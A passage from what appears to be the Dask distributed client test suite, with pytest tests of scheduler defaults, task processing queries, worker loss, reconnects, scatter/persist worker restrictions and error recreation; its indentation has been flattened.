await asyncio.sleep(0.01)
s.validate_state()
def test_default_get():
with cluster() as (s, [a, b]):
pre_get = dask.base.get_scheduler()
pytest.raises(KeyError, dask.config.get, "shuffle")
with Client(s["address"], set_as_default=True) as c:
assert dask.base.get_scheduler() == c.get
assert dask.config.get("shuffle") == "tasks"
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
c = Client(s["address"], set_as_default=False)
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
c.close()
c = Client(s["address"], set_as_default=True)
assert dask.config.get("shuffle") == "tasks"
assert dask.base.get_scheduler() == c.get
c.close()
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
with Client(s["address"]) as c:
assert dask.base.get_scheduler() == c.get
with Client(s["address"], set_as_default=False) as c:
assert dask.base.get_scheduler() != c.get
assert dask.base.get_scheduler() != c.get
with Client(s["address"], set_as_default=True) as c1:
assert dask.base.get_scheduler() == c1.get
with Client(s["address"], set_as_default=True) as c2:
assert dask.base.get_scheduler() == c2.get
assert dask.base.get_scheduler() == c1.get
assert dask.base.get_scheduler() == pre_get
@gen_cluster(client=True)
async def test_get_processing(c, s, a, b):
processing = await c.processing()
assert processing == valmap(tuple, s.processing)
futures = c.map(
slowinc, range(10), delay=0.1, workers=[a.address], allow_other_workers=True
)
await asyncio.sleep(0.2)
x = await c.processing()
assert set(x) == {a.address, b.address}
x = await c.processing(workers=[a.address])
assert isinstance(x[a.address], (list, tuple))
@gen_cluster(client=True)
async def test_get_foo(c, s, a, b):
futures = c.map(inc, range(10))
await wait(futures)
x = await c.scheduler.ncores()
assert x == s.nthreads
x = await c.scheduler.ncores(workers=[a.address])
assert x == {a.address: s.nthreads[a.address]}
x = await c.scheduler.has_what()
assert valmap(sorted, x) == valmap(sorted, s.has_what)
x = await c.scheduler.has_what(workers=[a.address])
assert valmap(sorted, x) == {a.address: sorted(s.has_what[a.address])}
x = await c.scheduler.nbytes(summary=False)
assert x == s.get_nbytes(summary=False)
x = await c.scheduler.nbytes(keys=[futures[0].key], summary=False)
assert x == {futures[0].key: s.tasks[futures[0].key].nbytes}
x = await c.scheduler.who_has()
assert valmap(sorted, x) == valmap(sorted, s.who_has)
x = await c.scheduler.who_has(keys=[futures[0].key])
assert valmap(sorted, x) == {futures[0].key: sorted(s.who_has[futures[0].key])}
def assert_dict_key_equal(expected, actual):
assert set(expected.keys()) == set(actual.keys())
for k in actual.keys():
ev = expected[k]
av = actual[k]
assert list(ev) == list(av)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 3)
async def test_get_foo_lost_keys(c, s, u, v, w):
x = c.submit(inc, 1, workers=[u.address])
y = await c.scatter(3, workers=[v.address])
await wait([x, y])
ua, va, wa = u.address, v.address, w.address
d = await c.scheduler.has_what()
assert_dict_key_equal(d, {ua: [x.key], va: [y.key], wa: []})
d = await c.scheduler.has_what(workers=[ua, va])
assert_dict_key_equal(d, {ua: [x.key], va: [y.key]})
d = await c.scheduler.who_has()
assert_dict_key_equal(d, {x.key: [ua], y.key: [va]})
d = await c.scheduler.who_has(keys=[x.key, y.key])
assert_dict_key_equal(d, {x.key: [ua], y.key: [va]})
await u.close()
await v.close()
d = await c.scheduler.has_what()
assert_dict_key_equal(d, {wa: []})
d = await c.scheduler.has_what(workers=[ua, va])
assert_dict_key_equal(d, {ua: [], va: []})
# The scattered key cannot be recomputed so it is forgotten
d = await c.scheduler.who_has()
assert_dict_key_equal(d, {x.key: []})
# ... but when passed explicitly, it is included in the result
d = await c.scheduler.who_has(keys=[x.key, y.key])
assert_dict_key_equal(d, {x.key: [], y.key: []})
@pytest.mark.slow
@gen_cluster(
client=True, Worker=Nanny, clean_kwargs={"threads": False, "processes": False}
)
async def test_bad_tasks_fail(c, s, a, b):
f = c.submit(sys.exit, 0)
with captured_logger(logging.getLogger("distributed.scheduler")) as logger:
with pytest.raises(KilledWorker) as info:
await f
text = logger.getvalue()
assert f.key in text
assert info.value.last_worker.nanny in {a.address, b.address}
await asyncio.gather(a.close(), b.close())
def test_get_processing_sync(c, s, a, b):
processing = c.processing()
assert not any(v for v in processing.values())
futures = c.map(
slowinc, range(10), delay=0.1, workers=[a["address"]], allow_other_workers=False
)
sleep(0.2)
aa = a["address"]
bb = b["address"]
processing = c.processing()
assert set(c.processing(aa)) == {aa}
assert set(c.processing([aa])) == {aa}
c.cancel(futures)
def test_close_idempotent(c):
c.close()
c.close()
c.close()
@nodebug
def test_get_returns_early(c):
start = time()
with suppress(RuntimeError):
result = c.get({"x": (throws, 1), "y": (sleep, 1)}, ["x", "y"])
assert time() < start + 0.5
# Futures should be released and forgotten
wait_for(lambda: not c.futures, timeout=0.1)
wait_for(lambda: not any(c.processing().values()), timeout=3)
x = c.submit(inc, 1)
x.result()
with suppress(RuntimeError):
result = c.get({"x": (throws, 1), x.key: (inc, 1)}, ["x", x.key])
assert x.key in c.futures
@pytest.mark.slow
@gen_cluster(Worker=Nanny, client=True)
async def test_Client_clears_references_after_restart(c, s, a, b):
x = c.submit(inc, 1)
assert x.key in c.refcount
await c.restart()
assert x.key not in c.refcount
key = x.key
del x
import gc
gc.collect()
await asyncio.sleep(0)
assert key not in c.refcount
@gen_cluster(Worker=Nanny, client=True)
async def test_restart_timeout_is_logged(c, s, a, b):
with captured_logger(logging.getLogger("distributed.client")) as logger:
await c.restart(timeout="0.5s")
text = logger.getvalue()
assert "Restart timed out after 0.50 seconds" in text
def test_get_stops_work_after_error(c):
with pytest.raises(RuntimeError):
c.get({"x": (throws, 1), "y": (sleep, 1.5)}, ["x", "y"])
start = time()
while any(c.processing().values()):
sleep(0.01)
assert time() < start + 0.5
def test_as_completed_list(c):
seq = c.map(inc, range(5))
seq2 = list(as_completed(seq))
assert set(c.gather(seq2)) == {1, 2, 3, 4, 5}
def test_as_completed_results(c):
seq = c.map(inc, range(5))
seq2 = list(as_completed(seq, with_results=True))
assert set(pluck(1, seq2)) == {1, 2, 3, 4, 5}
assert set(pluck(0, seq2)) == set(seq)
@pytest.mark.parametrize("with_results", [True, False])
def test_as_completed_batches(c, with_results):
n = 50
futures = c.map(slowinc, range(n), delay=0.01)
out = []
for batch in as_completed(futures, with_results=with_results).batches():
assert isinstance(batch, (tuple, list))
sleep(0.05)
out.extend(batch)
assert len(out) == n
if with_results:
assert set(pluck(1, out)) == set(range(1, n + 1))
else:
assert set(out) == set(futures)
def test_as_completed_next_batch(c):
futures = c.map(slowinc, range(2), delay=0.1)
ac = as_completed(futures)
assert not ac.is_empty()
assert ac.next_batch(block=False) == []
assert set(ac.next_batch(block=True)).issubset(futures)
while not ac.is_empty():
assert set(ac.next_batch(block=True)).issubset(futures)
assert ac.is_empty()
assert not ac.has_ready()
@gen_test()
async def test_status():
s = await Scheduler(port=0)
c = await Client(s.address, asynchronous=True)
assert c.status == "running"
x = c.submit(inc, 1)
await c.close()
assert c.status == "closed"
await s.close()
@gen_cluster(client=True)
async def test_persist_optimize_graph(c, s, a, b):
i = 10
for method in [c.persist, c.compute]:
b = db.range(i, npartitions=2)
i += 1
b2 = b.map(inc)
b3 = b2.map(inc)
b4 = method(b3, optimize_graph=False)
await wait(b4)
assert set(map(stringify, b3.__dask_keys__())).issubset(s.tasks)
b = db.range(i, npartitions=2)
i += 1
b2 = b.map(inc)
b3 = b2.map(inc)
b4 = method(b3, optimize_graph=True)
await wait(b4)
assert not any(stringify(k) in s.tasks for k in b2.__dask_keys__())
@gen_cluster(client=True, nthreads=[])
async def test_scatter_raises_if_no_workers(c, s):
with pytest.raises(TimeoutError):
await c.scatter(1, timeout=0.5)
@pytest.mark.slow
def test_reconnect(loop):
w = Worker("127.0.0.1", 9393, loop=loop)
loop.add_callback(w.start)
scheduler_cli = [
"dask-scheduler",
"--host",
"127.0.0.1",
"--port",
"9393",
"--no-dashboard",
]
with popen(scheduler_cli) as s:
c = Client("127.0.0.1:9393", loop=loop)
start = time()
while len(c.nthreads()) != 1:
sleep(0.1)
assert time() < start + 3
x = c.submit(inc, 1)
assert x.result() == 2
start = time()
while c.status != "connecting":
assert time() < start + 5
sleep(0.01)
assert x.status == "cancelled"
with pytest.raises(CancelledError):
x.result()
with popen(scheduler_cli) as s:
start = time()
while c.status != "running":
sleep(0.1)
assert time() < start + 5
start = time()
while len(c.nthreads()) != 1:
sleep(0.05)
assert time() < start + 15
x = c.submit(inc, 1)
assert x.result() == 2
start = time()
while True:
try:
x.result()
assert False
except CommClosedError:
continue
except CancelledError:
break
assert time() < start + 5
sleep(0.1)
sync(loop, w.close)
c.close()
@gen_cluster(client=True, nthreads=[], client_kwargs={"timeout": 0.5})
async def test_reconnect_timeout(c, s):
with captured_logger(logging.getLogger("distributed.client")) as logger:
await s.close()
start = time()
while c.status != "closed":
await c._update_scheduler_info()
await asyncio.sleep(0.05)
assert time() < start + 5, "Timeout waiting for reconnect to fail"
text = logger.getvalue()
assert "Failed to reconnect" in text
@pytest.mark.avoid_ci(reason="hangs on github actions ubuntu-latest CI")
@pytest.mark.slow
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@pytest.mark.parametrize("worker,count,repeat", [(Worker, 100, 5), (Nanny, 10, 20)])
def test_open_close_many_workers(loop, worker, count, repeat):
psutil = pytest.importorskip("psutil")
proc = psutil.Process()
with cluster(nworkers=0, active_rpc_timeout=2) as (s, _):
gc.collect()
before = proc.num_fds()
done = Semaphore(0)
running = weakref.WeakKeyDictionary()
workers = set()
status = True
async def start_worker(sleep, duration, repeat=1):
for i in range(repeat):
await asyncio.sleep(sleep)
if not status:
return
w = worker(s["address"], loop=loop)
running[w] = None
await w
workers.add(w)
addr = w.worker_address
running[w] = addr
await asyncio.sleep(duration)
await w.close()
del w
await asyncio.sleep(0)
done.release()
for i in range(count):
loop.add_callback(
start_worker, random.random() / 5, random.random() / 5, repeat=repeat
)
with Client(s["address"], loop=loop) as c:
sleep(1)
for i in range(count):
done.acquire(timeout=5)
gc.collect()
if not running:
break
start = time()
while c.nthreads():
sleep(0.2)
assert time() < start + 10
while len(workers) < count * repeat:
sleep(0.2)
status = False
[c.sync(w.close) for w in list(workers)]
for w in workers:
assert w.status == Status.closed
start = time()
while proc.num_fds() > before:
print("fds:", before, proc.num_fds())
sleep(0.1)
if time() > start + 10:
if worker == Worker: # this is an esoteric case
print("File descriptors did not clean up")
break
else:
raise ValueError("File descriptors did not clean up")
@gen_cluster(client=False, timeout=None)
async def test_idempotence(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
# Submit
x = c.submit(inc, 1)
await x
log = list(s.transition_log)
len_single_submit = len(log) # see last assert
y = f.submit(inc, 1)
assert x.key == y.key
await y
await asyncio.sleep(0.1)
log2 = list(s.transition_log)
assert log == log2
# Error
a = c.submit(div, 1, 0)
await wait(a)
assert a.status == "error"
log = list(s.transition_log)
b = f.submit(div, 1, 0)
assert a.key == b.key
await wait(b)
await asyncio.sleep(0.1)
log2 = list(s.transition_log)
assert log == log2
s.transition_log.clear()
# Simultaneous Submit
d = c.submit(inc, 2)
e = c.submit(inc, 2)
await wait([d, e])
assert len(s.transition_log) == len_single_submit
await c.close()
await f.close()
def test_scheduler_info(c):
info = c.scheduler_info()
assert isinstance(info, dict)
assert len(info["workers"]) == 2
assert isinstance(info["started"], float)
def test_write_scheduler_file(c):
info = c.scheduler_info()
with tmpfile("json") as scheduler_file:
c.write_scheduler_file(scheduler_file)
with Client(scheduler_file=scheduler_file) as c2:
info2 = c2.scheduler_info()
assert c.scheduler.address == c2.scheduler.address
# test that a ValueError is raised if the scheduler_file
# attribute is already set
with pytest.raises(ValueError):
c.write_scheduler_file(scheduler_file)
def test_get_versions(c):
requests = pytest.importorskip("requests")
v = c.get_versions()
assert v["scheduler"] is not None
assert v["client"] is not None
assert len(v["workers"]) == 2
for k, v in v["workers"].items():
assert v is not None
c.get_versions(check=True)
# smoke test for versions
# that this does not raise
v = c.get_versions(packages=["requests"])
assert v["client"]["packages"]["requests"] == requests.__version__
@gen_cluster(client=True)
async def test_async_get_versions(c, s, a, b):
await c.get_versions(check=True)
def test_threaded_get_within_distributed(c):
import dask.multiprocessing
for get in [dask.local.get_sync, dask.multiprocessing.get, dask.threaded.get]:
def f():
return get({"x": (lambda: 1,)}, "x")
future = c.submit(f)
assert future.result() == 1
@gen_cluster(client=True)
async def test_lose_scattered_data(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
await a.close()
await asyncio.sleep(0.1)
assert x.status == "cancelled"
assert x.key not in s.tasks
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 3)
async def test_partially_lose_scattered_data(e, s, a, b, c):
x = await e.scatter(1, workers=a.address)
await e.replicate(x, n=2)
await a.close()
await asyncio.sleep(0.1)
assert x.status == "finished"
assert s.get_task_status(keys=[x.key]) == {x.key: "memory"}
@gen_cluster(client=True)
async def test_scatter_compute_lose(c, s, a, b):
[x] = await c.scatter([[1, 2, 3, 4]], workers=a.address)
y = c.submit(inc, 1, workers=b.address)
z = c.submit(slowadd, x, y, delay=0.2)
await asyncio.sleep(0.1)
await a.close()
with pytest.raises(CancelledError):
await wait(z)
assert x.status == "cancelled"
assert y.status == "finished"
assert z.status == "cancelled"
@gen_cluster(client=True)
async def test_scatter_compute_store_lose(c, s, a, b):
"""
Create irreplaceable data on one machine,
cause a dependent computation to occur on another and complete
Kill the machine with the irreplaceable data. What happens to the complete
result? How about after it GCs and tries to come back?
"""
x = await c.scatter(1, workers=a.address)
xx = c.submit(inc, x, workers=a.address)
y = c.submit(inc, 1)
z = c.submit(slowadd, xx, y, delay=0.2, workers=b.address)
await wait(z)
await a.close()
start = time()
while x.status == "finished":
await asyncio.sleep(0.01)
assert time() < start + 2
# assert xx.status == 'finished'
assert y.status == "finished"
assert z.status == "finished"
zz = c.submit(inc, z)
await wait(zz)
zkey = z.key
del z
start = time()
while s.get_task_status(keys=[zkey]) != {zkey: "released"}:
await asyncio.sleep(0.01)
assert time() < start + 2
xxkey = xx.key
del xx
start = time()
while x.key in s.tasks and zkey not in s.tasks and xxkey not in s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 2
@gen_cluster(client=True)
async def test_scatter_compute_store_lose_processing(c, s, a, b):
"""
Create irreplaceable data on one machine,
cause a dependent computation to occur on another and complete
Kill the machine with the irreplaceable data. What happens to the complete
result? How about after it GCs and tries to come back?
"""
[x] = await c.scatter([1], workers=a.address)
y = c.submit(slowinc, x, delay=0.2)
z = c.submit(inc, y)
await asyncio.sleep(0.1)
await a.close()
start = time()
while x.status == "finished":
await asyncio.sleep(0.01)
assert time() < start + 2
assert y.status == "cancelled"
assert z.status == "cancelled"
@gen_cluster(client=False)
async def test_serialize_future(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
future = c1.submit(lambda: 1)
result = await future
for ci in (c1, c2):
for ctxman in ci.as_current, lambda: temp_default_client(ci):
with ctxman():
future2 = pickle.loads(pickle.dumps(future))
assert future2.client is ci
assert stringify(future2.key) in ci.futures
result2 = await future2
assert result == result2
await c1.close()
await c2.close()
@gen_cluster(client=False)
async def test_temp_default_client(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
with temp_default_client(c1):
assert default_client() is c1
assert default_client(c2) is c2
with temp_default_client(c2):
assert default_client() is c2
assert default_client(c1) is c1
await c1.close()
await c2.close()
@gen_cluster(client=True)
async def test_as_current(c, s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
with temp_default_client(c):
assert Client.current() is c
with pytest.raises(ValueError):
Client.current(allow_global=False)
with c1.as_current():
assert Client.current() is c1
assert Client.current(allow_global=True) is c1
with c2.as_current():
assert Client.current() is c2
assert Client.current(allow_global=True) is c2
await c1.close()
await c2.close()
def test_as_current_is_thread_local(s):
l1 = threading.Lock()
l2 = threading.Lock()
l3 = threading.Lock()
l4 = threading.Lock()
l1.acquire()
l2.acquire()
l3.acquire()
l4.acquire()
def run1():
with Client(s["address"]) as c:
with c.as_current():
l1.acquire()
l2.release()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.acquire()
l4.release()
def run2():
with Client(s["address"]) as c:
with c.as_current():
l1.release()
l2.acquire()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.release()
l4.acquire()
t1 = threading.Thread(target=run1)
t2 = threading.Thread(target=run2)
t1.start()
t2.start()
t1.join()
t2.join()
@gen_cluster(client=False)
async def test_as_current_is_task_local(s, a, b):
l1 = asyncio.Lock()
l2 = asyncio.Lock()
l3 = asyncio.Lock()
l4 = asyncio.Lock()
await l1.acquire()
await l2.acquire()
await l3.acquire()
await l4.acquire()
async def run1():
async with Client(s.address, asynchronous=True) as c:
with c.as_current():
await l1.acquire()
l2.release()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
await l3.acquire()
l4.release()
async def run2():
async with Client(s.address, asynchronous=True) as c:
with c.as_current():
l1.release()
await l2.acquire()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.release()
await l4.acquire()
await asyncio.gather(run1(), run2())
@nodebug # test timing is fragile
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_persist_workers_annotate(e, s, a, b, c):
with dask.annotate(workers=a.address, allow_other_workers=False):
L1 = [delayed(inc)(i) for i in range(4)]
with dask.annotate(workers=b.address, allow_other_workers=False):
total = delayed(sum)(L1)
with dask.annotate(workers=c.address, allow_other_workers=True):
L2 = [delayed(add)(i, total) for i in L1]
with dask.annotate(workers=b.address, allow_other_workers=True):
total2 = delayed(sum)(L2)
# TODO: once annotations are faithfully forwarded upon graph optimization,
# we shouldn't need to disable that here.
out = e.persist(L1 + L2 + [total, total2], optimize_graph=False)
await wait(out)
assert all(v.key in a.data for v in L1)
assert total.key in b.data
assert s.loose_restrictions == {total2.key} | {v.key for v in L2}
@nodebug # test timing is fragile
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_persist_workers(e, s, a, b, c):
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
total2 = delayed(sum)(L2)
out = e.persist(
L1 + L2 + [total, total2],
workers=[a.address, b.address],
allow_other_workers=True,
)
await wait(out)
for v in L1 + L2 + [total, total2]:
assert s.worker_restrictions[v.key] == {a.address, b.address}
assert not any(c.address in r for r in s.worker_restrictions)
assert s.loose_restrictions == {total.key, total2.key} | {v.key for v in L1 + L2}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_compute_workers_annotate(e, s, a, b, c):
with dask.annotate(workers=a.address, allow_other_workers=True):
L1 = [delayed(inc)(i) for i in range(4)]
with dask.annotate(workers=b.address, allow_other_workers=True):
total = delayed(sum)(L1)
with dask.annotate(workers=[c.address]):
L2 = [delayed(add)(i, total) for i in L1]
# TODO: once annotations are faithfully forwarded upon graph optimization,
# we shouldn't need to disable that here.
out = e.compute(L1 + L2 + [total], optimize_graph=False)
await wait(out)
for v in L1:
assert s.worker_restrictions[v.key] == {a.address}
for v in L2:
assert s.worker_restrictions[v.key] == {c.address}
assert s.worker_restrictions[total.key] == {b.address}
assert s.loose_restrictions == {total.key} | {v.key for v in L1}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_compute_workers(e, s, a, b, c):
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
out = e.compute(
L1 + L2 + [total],
workers=[a.address, b.address],
allow_other_workers=True,
)
await wait(out)
for v in L1 + L2 + [total]:
assert s.worker_restrictions[v.key] == {a.address, b.address}
assert not any(c.address in r for r in s.worker_restrictions)
assert s.loose_restrictions == {total.key} | {v.key for v in L1 + L2}
@gen_cluster(client=True)
async def test_compute_nested_containers(c, s, a, b):
da = pytest.importorskip("dask.array")
np = pytest.importorskip("numpy")
x = da.ones(10, chunks=(5,)) + 1
future = c.compute({"x": [x], "y": 123})
result = await future
assert isinstance(result, dict)
assert (result["x"][0] == np.ones(10) + 1).all()
assert result["y"] == 123
@gen_cluster(client=True)
async def test_scatter_type(c, s, a, b):
[future] = await c.scatter([1])
assert future.type == int
d = await c.scatter({"x": 1.0})
assert d["x"].type == float
@gen_cluster(client=True)
async def test_retire_workers_2(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
await s.retire_workers(workers=[a.address])
assert b.data == {x.key: 1}
assert s.who_has == {x.key: {b.address}}
assert s.has_what == {b.address: {x.key}}
assert a.address not in s.workers
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_retire_many_workers(c, s, *workers):
futures = await c.scatter(list(range(100)))
await s.retire_workers(workers=[w.address for w in workers[:7]])
results = await c.gather(futures)
assert results == list(range(100))
while len(s.workers) != 3:
await asyncio.sleep(0.01)
assert len(s.has_what) == len(s.nthreads) == 3
assert all(future.done() for future in futures)
assert all(s.tasks[future.key].state == "memory" for future in futures)
for w, keys in s.has_what.items():
assert 15 < len(keys) < 50
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 3)] * 2,
config={"distributed.scheduler.default-task-durations": {"f": "10ms"}},
)
async def test_weight_occupancy_against_data_movement(c, s, a, b):
s.extensions["stealing"]._pc.callback_time = 1000000
def f(x, y=0, z=0):
sleep(0.01)
return x
y = await c.scatter([[1, 2, 3, 4]], workers=[a.address])
z = await c.scatter([1], workers=[b.address])
futures = c.map(f, [1, 2, 3, 4], y=y, z=z)
await wait(futures)
assert sum(f.key in a.data for f in futures) >= 2
assert sum(f.key in b.data for f in futures) >= 1
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 1), ("127.0.0.1", 10)],
config={"distributed.scheduler.default-task-durations": {"f": "10ms"}},
)
async def test_distribute_tasks_by_nthreads(c, s, a, b):
s.extensions["stealing"]._pc.callback_time = 1000000
def f(x, y=0):
sleep(0.01)
return x
y = await c.scatter([1], broadcast=True)
futures = c.map(f, range(20), y=y)
await wait(futures)
assert len(b.data) > 2 * len(a.data)
@gen_cluster(client=True, clean_kwargs={"threads": False})
async def test_add_done_callback(c, s, a, b):
S = set()
def f(future):
future.add_done_callback(g)
def g(future):
S.add((future.key, future.status))
u = c.submit(inc, 1, key="u")
v = c.submit(throws, "hello", key="v")
w = c.submit(slowinc, 2, delay=0.3, key="w")
x = c.submit(inc, 3, key="x")
u.add_done_callback(f)
v.add_done_callback(f)
w.add_done_callback(f)
await wait((u, v, w, x))
x.add_done_callback(f)
t = time()
while len(S) < 4 and time() - t < 2.0:
await asyncio.sleep(0.01)
assert S == {(f.key, f.status) for f in (u, v, w, x)}
@gen_cluster(client=True)
async def test_normalize_collection(c, s, a, b):
x = delayed(inc)(1)
y = delayed(inc)(x)
z = delayed(inc)(y)
yy = c.persist(y)
zz = c.normalize_collection(z)
assert len(z.dask) == len(y.dask) + 1
assert isinstance(zz.dask[y.key], Future)
assert len(zz.dask) < len(z.dask)
@gen_cluster(client=True)
async def test_normalize_collection_dask_array(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=(5,))
y = x + 1
yy = c.persist(y)
z = y.sum()
zdsk = dict(z.dask)
zz = c.normalize_collection(z)
assert z.dask == zdsk # do not mutate input
assert len(z.dask) > len(zz.dask)
assert any(isinstance(v, Future) for v in zz.dask.values())
for k, v in yy.dask.items():
assert zz.dask[k].key == v.key
result1 = await c.compute(z)
result2 = await c.compute(zz)
assert result1 == result2
@pytest.mark.slow
def test_normalize_collection_with_released_futures(c):
da = pytest.importorskip("dask.array")
x = da.arange(2 ** 20, chunks=2 ** 10)
y = x.persist()
wait(y)
sol = y.sum().compute()
# Start releasing futures
del y
# Try to reuse futures. Previously this was a race condition,
# and the call to `.compute()` would error out due to missing
# futures on the scheduler at compute time.
normalized = c.normalize_collection(x)
res = normalized.sum().compute()
assert res == sol
@pytest.mark.xfail(reason="https://github.com/dask/distributed/issues/4404")
@gen_cluster(client=True)
async def test_auto_normalize_collection(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=5)
assert len(x.dask) == 2
with dask.config.set(optimizations=[c._optimize_insert_futures]):
y = x.map_blocks(slowinc, delay=1, dtype=x.dtype)
yy = c.persist(y)
await wait(yy)
start = time()
future = c.compute(y.sum())
await future
end = time()
assert end - start < 1
start = time()
z = c.persist(y + 1)
await wait(z)
end = time()
assert end - start < 1
@pytest.mark.xfail(reason="https://github.com/dask/distributed/issues/4404")
def test_auto_normalize_collection_sync(c):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=5)
y = x.map_blocks(slowinc, delay=1, dtype=x.dtype)
yy = c.persist(y)
wait(yy)
with dask.config.set(optimizations=[c._optimize_insert_futures]):
start = time()
y.sum().compute()
end = time()
assert end - start < 1
def assert_no_data_loss(scheduler):
for key, start, finish, recommendations, _ in scheduler.transition_log:
if start == "memory" and finish == "released":
for k, v in recommendations.items():
assert not (k == key and v == "waiting")
@gen_cluster(client=True, timeout=None)
async def test_interleave_computations(c, s, a, b):
import distributed
distributed.g = s
xs = [delayed(slowinc)(i, delay=0.02) for i in range(30)]
ys = [delayed(slowdec)(x, delay=0.02) for x in xs]
zs = [delayed(slowadd)(x, y, delay=0.02) for x, y in zip(xs, ys)]
total = delayed(sum)(zs)
future = c.compute(total)
done = ("memory", "released")
await asyncio.sleep(0.1)
x_keys = [x.key for x in xs]
y_keys = [y.key for y in ys]
z_keys = [z.key for z in zs]
while not s.tasks or any(w.processing for w in s.workers.values()):
await asyncio.sleep(0.05)
x_done = sum(state in done for state in s.get_task_status(keys=x_keys).values())
y_done = sum(state in done for state in s.get_task_status(keys=y_keys).values())
z_done = sum(state in done for state in s.get_task_status(keys=z_keys).values())
assert x_done >= y_done >= z_done
assert x_done < y_done + 10
assert y_done < z_done + 10
assert_no_data_loss(s)
@pytest.mark.skip(reason="Now prefer first-in-first-out")
@gen_cluster(client=True, timeout=None)
async def test_interleave_computations_map(c, s, a, b):
xs = c.map(slowinc, range(30), delay=0.02)
ys = c.map(slowdec, xs, delay=0.02)
zs = c.map(slowadd, xs, ys, delay=0.02)
done = ("memory", "released")
x_keys = [x.key for x in xs]
y_keys = [y.key for y in ys]
z_keys = [z.key for z in zs]
while not s.tasks or any(w.processing for w in s.workers.values()):
await asyncio.sleep(0.05)
x_done = sum(state in done for state in s.get_task_status(keys=x_keys).values())
y_done = sum(state in done for state in s.get_task_status(keys=y_keys).values())
z_done = sum(state in done for state in s.get_task_status(keys=z_keys).values())
assert x_done >= y_done >= z_done
assert x_done < y_done + 10
assert y_done < z_done + 10
@gen_cluster(client=True)
async def test_scatter_dict_workers(c, s, a, b):
await c.scatter({"a": 10}, workers=[a.address, b.address])
assert "a" in a.data or "a" in b.data
@pytest.mark.flaky(reruns=10, reruns_delay=5, condition=MACOS)
@pytest.mark.slow
@gen_test()
async def test_client_timeout():
c = Client("127.0.0.1:57484", asynchronous=True)
s = Scheduler(loop=c.loop, port=57484)
await asyncio.sleep(4)
try:
await s
except EnvironmentError: # port in use
await c.close()
return
start = time()
await c
try:
assert time() < start + 2
finally:
await c.close()
await s.close()
@gen_cluster(client=True)
async def test_submit_list_kwargs(c, s, a, b):
futures = await c.scatter([1, 2, 3])
def f(L=None):
return sum(L)
future = c.submit(f, L=futures)
result = await future
assert result == 1 + 2 + 3
@gen_cluster(client=True)
async def test_map_list_kwargs(c, s, a, b):
futures = await c.scatter([1, 2, 3])
def f(i, L=None):
return i + sum(L)
futures = c.map(f, range(10), L=futures)
results = await c.gather(futures)
assert results == [i + 6 for i in range(10)]
@gen_cluster(client=True)
async def test_dont_clear_waiting_data(c, s, a, b):
start = time()
x = await c.scatter(1)
y = c.submit(slowinc, x, delay=0.5)
while y.key not in s.tasks:
await asyncio.sleep(0.01)
key = x.key
del x
for i in range(5):
assert s.waiting_data[key]
await asyncio.sleep(0)
@gen_cluster(client=True)
async def test_get_future_error_simple(c, s, a, b):
f = c.submit(div, 1, 0)
await wait(f)
assert f.status == "error"
function, args, kwargs, deps = await c._get_futures_error(f)
# args contains only solid values, not keys
assert function.__name__ == "div"
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_get_futures_error(c, s, a, b):
x0 = delayed(dec)(2, dask_key_name="x0")
y0 = delayed(dec)(1, dask_key_name="y0")
x = delayed(div)(1, x0, dask_key_name="x")
y = delayed(div)(1, y0, dask_key_name="y")
tot = delayed(sum)(x, y, dask_key_name="tot")
f = c.compute(tot)
await wait(f)
assert f.status == "error"
function, args, kwargs, deps = await c._get_futures_error(f)
assert function.__name__ == "div"
assert args == (1, y0.key)
@gen_cluster(client=True)
async def test_recreate_error_delayed(c, s, a, b):
x0 = delayed(dec)(2)
y0 = delayed(dec)(1)
x = delayed(div)(1, x0)
y = delayed(div)(1, y0)
tot = delayed(sum)(x, y)
f = c.compute(tot)
assert f.status == "pending"
function, args, kwargs = await c._recreate_error_locally(f)
assert f.status == "error"
assert function.__name__ == "div"
assert args == (1, 0)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_futures(c, s, a, b):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 1)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, x, y)
f = c.compute(tot)
assert f.status == "pending"
function, args, kwargs = await c._recreate_error_locally(f)
assert f.status == "error"
assert function.__name__ == "div"
assert args == (1, 0)
